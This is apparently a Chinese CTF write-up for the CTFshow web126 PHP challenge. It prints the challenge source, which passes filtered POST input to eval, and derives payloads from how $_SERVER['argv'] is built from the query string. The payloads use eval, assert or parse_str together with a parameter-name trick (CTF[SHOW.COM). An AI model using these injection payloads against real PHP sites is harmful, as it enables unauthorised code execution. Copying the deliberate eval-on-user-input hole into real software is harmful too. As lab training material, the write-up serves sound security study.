CTFshow-WEB入门-php特性web126
题目代码
<?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # # */ error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i", $c) && strlen($c)<=16){ eval("$c".";"); if($fl0g==="flag_give_me"){ echo $flag; } } }
php.ini配置register_argc_argv=On
——————————————
实验
<?php echo $_SERVER['QUERY_STRING']; echo '<br>'; var_dump($_SERVER['argv']);
?$fl0g=flag_give_me;的回显 $fl0g=flag_give_me; array(1) { [0]=> string(19) "$fl0g=flag_give_me;" }
?$x=x+$fl0g=flag_give_me;的回显 $x=x+$fl0g=flag_give_me; array(2) { [0]=> string(4) "$x=x" [1]=> string(19) "$fl0g=flag_give_me;" }
——————————————
于是可以得出让 $fl0g="flag_give_me" 的几种组合
?$fl0g=flag_give_me; $a等于["$fl0g=flag_give_me;"] $c等于eval($a[0]) 也就是执行了eval("$fl0g=flag_give_me;");
?$fl0g=flag_give_me $a等于["$fl0g=flag_give_me"] $c等于assert($a[0]) 也就是执行了assert("$fl0g=flag_give_me");
?a=1+fl0g=flag_give_me $a等于["a=1","fl0g=flag_give_me"] $c等于parse_str($a[1]) 也就是执行了parse_str("fl0g=flag_give_me");解析到变量中
最后一个不能用?fl0g=flag_give_me是因为要满足 !isset($_GET['fl0g'] 这个条件
——————————————
参数名带有这些符号GET( 空格+.[ )、POST( 空格.[ )会转为_
特殊的是遇到 [ ,后面的会保持原符号
所以应该这样传CTF_SHOW=&CTF[SHOW.COM=&fun=eval($a[0])
